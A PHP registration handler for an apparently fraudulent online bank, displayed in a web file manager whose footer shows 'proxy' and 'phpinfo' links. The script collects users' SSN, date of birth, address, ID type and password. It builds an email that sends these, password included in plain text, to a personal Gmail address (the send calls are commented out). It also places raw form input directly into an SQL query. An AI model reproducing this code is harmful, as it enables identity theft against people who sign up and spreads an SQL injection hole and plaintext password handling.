File manager - Edit - /home/justdoit/springoneconsolidated.com/bpsk/registeraccount.php
Back
<?php require_once('db.php'); $f =$_POST['fname']; $middle =$_POST['Middle']; $l =$_POST['lname']; $email =$_POST['email']; $phone =$_POST['phone']; $dob =$_POST['dob']; $address =$_POST['address']; $username=$_POST['username']; $zip =$_POST['zip']; $gender =$_POST['gender']; $pwd =$_POST['userpassword']; $ssn =$_POST['ssn']; $id_type =$_POST['id_type']; $file =$_POST['my_file']; $SQL="INSERT INTO users(fname, lname,country,gender,phone_number,AccountNumber,password,username,email,Balance,Amount) VALUES ('$f','$l','$gender','$address','$phone','$username','$pwd','$username','$email','0.00','0.00');"; //client mail con //mysqli_query($conn,$SQL)mysqli_query($conn,$SQL) if(1==1){ }else{ } $to =$email; $subject = " Welcome to Spring One Consolidated Bank Bank Online Banking!"; $txt = " Dear Sir/Madam, We are delighted to welcome you to Spring One Consolidated Bank Bank Online Banking! Thank you for choosing us as your trusted financial partner. Your registration is now complete, and you can begin enjoying the convenience and security of managing your finances online. Next Steps: Login: Visit our website at https://springoneconsolidated.com/bpsk/index.html . Enter Details: Use the username and password you provided during the registration process to log in. Explore Features: Discover the various features of our Online Banking platform, including account balances, transaction history, fund transfers, and more. Security Tips: Never share your password or personal information with anyone. If you suspect any unauthorized activity, promptly contact our customer support. We are dedicated to providing you with a seamless and secure online banking experience. Should you have any questions or require assistance, please feel free to reach out to our dedicated customer support team at +447441461413 or customerservices@springoneconsolidated.com. Thank you for choosing Spring One Consolidated Bank Bank! We eagerly anticipate serving you. Best Regards, Spring One Consolidated Bank Bank customerservices@springoneconsolidated.com "; $subject="Thank You"; $headers = "From:noreply@springoneconsolidated.com" . "\r\n" ; // mail($to,$subject,$txt,$headers); //admin mail body $main="lizkline653@gmail.com"; $message = '<!doctype html><html lang="en"><body>'; //$message .= "<img src='https://springoneconsolidated.com/templates/current/images/logoMobile.png' alt='Swiss Banking' />"; $message .= "<center><table rules='all' style='border-color: #666;' cellpadding='10'>"; $message .= "<tr><td><strong>Spring One Consolided Banking </strong> </td><td><img src='https://springoneconsolidated.com/logo.png' alt='SROB Banking' /></td></tr>"; $message .= "<tr style='background: #eee;'><td><strong>Full Name:</strong> </td><td> " . $_POST['f1'] ." ". $middle ." " . $_POST['f2']. "</td></tr>"; $message .= "<tr><td><strong>Email:</strong> </td><td>" . $email . "</td></tr>"; $message .= "<tr><td><strong>Address:</strong> </td><td>" . $address . "</td></tr>"; $message .= "<tr><td><strong>Phone:</strong> </td><td>" . $phone . "</td></tr>"; $message .= "<tr><td><strong>SSN</strong> </td><td>" . $ssn . "</td></tr>"; $message .= "<tr><td><strong>ID Type </strong> </td><td>" . $id_type . "</td></tr>"; $message .= "<tr><td><strong>Zip Code :</strong> </td><td>" . $zip . "</td></tr>"; $message .= "<tr><td><strong>DOB :</strong> </td><td>" . $dob . "</td></tr>"; $message .= "<tr><td><strong>Passpord :</strong> </td><td>" . $pwd . "</td></tr>"; $message .= "<tr><td><strong>Uploaded Id :</strong> </td><td><img src='https://springoneconsolidated.com/upload/".""."'></td></tr>"; $message .= "</table></center>"; $message .= "</body></html>"; $subject2="New Account Created ". date("d/m/y"); // echo $message; $headers = "From:noreply@springoneconsolidated.com" . "\r\n" ; $headers .= "MIME-Version: 1.0" . "\r\n"; $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n"; //mail('lisabeauity@gmail.com',$subject2,$message,$headers); //echo $id_type . " <br/> " . $file . " <br/> " . $f . " <br/>" . $l . " <br/>" . $middle . " <br/>" . $phone . "<br/> " . $dob . " <br/>" . $address . "<br/>" . $ssn. "<br/> " . $zip . "<br/>". $gender . " <br/>" .$pwd; ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Thank You For Enrolling </title> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css"> <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script> <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/js/bootstrap.min.js"></script> <script> $(document).ready(function(){ $("#myModal").modal('show'); }); </script> </head> <body> <div id="myModal" class="modal fade"> <div class="modal-dialog"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title">Thank You For Enrolling. </h5> <button type="button" class="close" data-dismiss="modal">×</button> </div> <div class="modal-body"> <p>Thank you for enrolling ,please kindly check your mail & Wait for Approval</p> <button type="submit" class="btn btn-primary" onclick='window.location.replace("https://springoneconsolidated.com/");'>Home</button> </div> </div> </div> </div> <script> <!-- setTimeout(function(){window.location.replace('https://springoneconsolidated.com/');}, 2000); //--> </script> </body> </html>
| ver. 1.4 |
Github
|
.
| PHP 8.2.31 | Generation time: 5.6 |
proxy
|
phpinfo
|
Settings